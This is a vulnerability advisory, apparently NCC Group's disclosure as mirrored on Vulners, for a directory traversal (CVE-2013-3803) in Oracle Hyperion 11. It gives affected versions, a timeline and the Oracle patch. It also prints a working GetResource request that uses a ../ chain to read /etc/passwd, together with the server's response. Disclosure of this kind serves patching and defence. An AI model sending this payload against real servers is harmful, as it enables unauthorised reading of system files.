Vulners
Lucene search
Oracle Hyperion 11 Directory Traversal
🗓️ 31 Jul 2013 00:00:00Reported by Richard WarrenType 
packetstorm🔗 packetstormsecurity.com👁 30 Views
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Oracle Hyperion 11 - Directory Traversal | 3 Aug 201300:00 | – | zdt |
 | CVE-2013-3803 | 17 Jul 201313:41 | – | attackerkb |
 | CVE-2013-3803 | 2 Aug 201300:00 | – | circl |
 | CVE-2013-3803 | 17 Jul 201310:00 | – | cve |
 | CVE-2013-3803 | 17 Jul 201310:00 | – | cvelist |
 | Oracle Hyperion 11 - Directory Traversal | 2 Aug 201300:00 | – | exploitdb |
 | Oracle Hyperion 11 - Directory Traversal | 2 Aug 201300:00 | – | exploitpack |
 | CVE-2013-3803 | 17 Jul 201313:41 | – | nvd |
 | Oracle Critical Patch Update - July 2013 | 16 Jul 201300:00 | – | oracle |
| Oracle Critical Patch Update - July 2013 | 16 Jul 201300:00 | – | oracle |
10
`=======
Summary
=======
Name: Oracle Hyperion 11 - Directory Traversal
Release Date: 30 July 2013
Reference: NGS00434
Discoverer: Richard Warren <[email protected]>
Vendor: Oracle
Vendor Reference: S0318807
Systems Affected: Oracle Hyperion 11.1.1.3, 11.1.1.4.107 and earlier, 11.1.2.1.129 and earlier, and 11.1.2.2.305 and earlier
Risk: High
Status: Published
========
TimeLine
========
Discovered: 20 November 2012
Released: 20 November 2012
Approved: 20 November 2012
Reported: 20 November 2012
Fixed: 16 July 2013
Published: 30 July 2013
===========
Description
===========
Product: Oracle
Application: Hyperion
Version: 11.x
Vulnerability
-------------
The application was found to be vulnerable to a directory traversal attack.
The following URL resulted in directory transversal.
http://localhost:19000/raframework/ihtml/GetResource?DocUUID=00000122ad09cf47-0000-d521-0aeaf211&DocInstanceID=1&ResourceName=../../../../../../../../../../../../../../../../LFI_HERE
=================
Technical Details
=================
Exploitation
------------
The following request/response was observed:
GET
/raframework/ihtml/GetResource?DocUUID=00000122ad09cf47-0000-d521-0aeaf211&DocInstanceID=1&ResourceName=../../../../../../../../../../../../../../../../etc/passwd
HTTP/1.0
HTTP/1.1 200 OK
Date: Mon, 12 Nov 2012 15:28:10 GMT
Server: Oracle-Application-Server-11g
Cache-Control: no-cache
Pragma: no-cache
Expires: Mon, 1 Jan 1990 00:00:00 GMT
Last-Modified: Mon, 12 Nov 2012 15:28:10 GMT
X-ORACLE-DMS-ECID: 004n^rmuJTjAtH^5lV5EiZ0004FS0058zX
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/plain
Content-Language: en
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
--SNIP--
===============
Fix Information
===============
Fixed in Oracle CPU July 2013:
http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html
Assigned CVE-2013-3803
NCC Group Research
http://www.nccgroup.com/research
For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>
This email message has been delivered safely and archived online by Mimecast.
</a>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Jul 2013 00:00Current
EPSS0.20369